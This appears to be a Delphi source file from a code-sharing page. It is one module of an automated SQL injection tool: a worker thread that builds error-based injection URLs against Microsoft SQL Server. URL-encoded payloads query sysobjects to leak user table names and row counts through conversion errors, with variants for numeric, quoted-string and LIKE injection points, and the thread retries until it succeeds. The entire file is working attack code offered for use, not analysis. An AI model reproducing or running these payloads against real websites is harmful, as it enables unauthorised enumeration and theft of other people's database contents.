📄 threaderrortable.pas
字号:
unit ThreadErrorTable;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,ComCtrls;
type
TThreadErrorTable = class(TThread)
FURL:string;
iRow:integer;
complete:boolean;
TableName:string;
RowCount:string;
private
function GetURLContent(URL: string): string;
function GetTableName(str_url:string;iTop:integer):string;
function GetURLMsgTableName(URL: string):string;
function GetResultStr(str: string): string;
function GetRecordCount(str_url,TableName:string):string;
private
published
procedure Execute; override;
public
end;
implementation
uses
main_unit,CJdatabase_unit,define_unit,ThreadHttpGet;
//******************************************************************************
procedure TThreadErrorTable.Execute;
var
item:TListItem;
i:integer;
label start ;
begin
sleep(1000);
start:
complete:=false;
TableName:=GetTableName(FURL,iRow);
RowCount:=GetRecordCount(FURL,TableName);
if (TableName='未知') or (RowCount='未知') then
goto start;
item:=Form_main.ListView_table.Items.Add;
item.Caption:=inttostr(item.Index+1);
ThdObjCompleteCount:=ThdObjCompleteCount+1;
item.SubItems.Add(TableName);
item.SubItems.Add(RowCount);
complete:=true;
end;
//******************************************************************************
function TThreadErrorTable.GetResultStr(str: string): string;
var
iStart, iEnd: integer;
ss: string;
begin
iStart := pos('^', str);
if iStart > 0 then
begin
ss := copy(str, iStart + 1, length(str) - iStart);
iEnd := pos('^', ss);
if iEnd > 0 then
begin
ss := copy(ss, 1, iEnd - 1);
end;
end;
if ss = '' then
Result := '未知'
else Result := ss;
end;
//******************************************************************************
//函数:判断某个页面是否存在
function TThreadErrorTable.GetURLMsgTableName(URL: string):string;
var
ss:string;
begin
ss:=GetURLContent(URL);
result:=GetResultStr(ss);
end;
//****************************************************************************
//获取页面内容
function TThreadErrorTable.GetURLContent(URL: string): string;
var
IdGetObj:TThreadHttpGet;
begin
try
Result := '';
IdGetObj:=TThreadHttpGet.Create(true);
IdGetObj.TimeOut:=TimeOut;//timeout30秒
IdGetObj.FURL:=URL;
IdGetObj.Success:=false;
IdGetObj.Resume;
while not IdGetObj.Success do
begin
application.ProcessMessages;
sleep(50);
end;
Result :=IdGetObj.sContent;
finally
IdGetObj.Free;
IdGetObj:=nil;
end;
end;
//**********************************************************
//函数:获取数据库表名
function TThreadErrorTable.GetTableName(str_url:string;iTop:integer):string;
var
str_ext:string;
URL:string;
begin
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
try
//*********************
str_ext:='%20And%20(Select%20Top%201%20cast(char(94)%2Bname%2Bchar(94)%20as%20varchar(8000))' +
'%20from(Select%20Top%20' + inttostr(iTop) + '%20id,name%20from%20[' + FDbName + ']..[sysobjects]' +
'%20Where%20xtype=char(85)%20order%20by%20name%20asc,id%20desc)%20T%20order%20by%20name%20desc,id%20asc)>0';
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
result:=GetURLMsgTableName(URL);
finally
end;
end;
//******************************************************************************
//**********************************************************
//函数:获取表的记录数 ,返回一个表示记录数的字符
function TThreadErrorTable.GetRecordCount(str_url,TableName:string):string;
var
sCount:string;//存放返回的表示记录数的字符
URL:string;
str_ext:string;
begin
//*********************
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
str_ext:='%20And%20(Select%20char(94)%2BCast(Count(1)%20as%20varchar(8000))'+
'%2Bchar(94)%20From%20['+FDbName+']..['+ TableName + ']%20Where%201=1)>0';
//*********************
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
try
sCount:=GetURLMsgTableName(URL);
except
on E:Exception do
begin
//Application.MessageBox(pchar('获取表记录数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
try
strtoint(sCount);
except
sCount:='未知';
end;
result:=sCount;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -